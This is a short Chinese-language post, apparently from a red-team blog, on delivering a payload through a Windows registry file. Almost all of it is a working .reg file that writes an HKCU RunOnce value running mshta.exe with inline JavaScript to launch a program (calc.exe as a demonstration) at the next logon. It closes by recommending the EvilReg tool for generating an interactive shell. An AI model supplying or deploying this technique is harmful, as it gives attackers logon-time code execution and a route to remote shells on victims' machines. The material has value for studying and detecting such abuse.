Reg

9 months ago

red.ghostwolflab.com

1 minute

该方法通过Windows注册表文件来交付Payload。

编辑.reg文件内容如下：

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"calcpoc"="C:\\Windows\\System32\\mshta.exe \"javascript:(new ActiveXObject(\"WScript.Shell\")).Run(\"calc.exe\")\""

运行该reg文件后，当Windows的用户重新登录后，便会弹出一个计算器：

也可以使用 EvilReg 工具生成交互式Shell。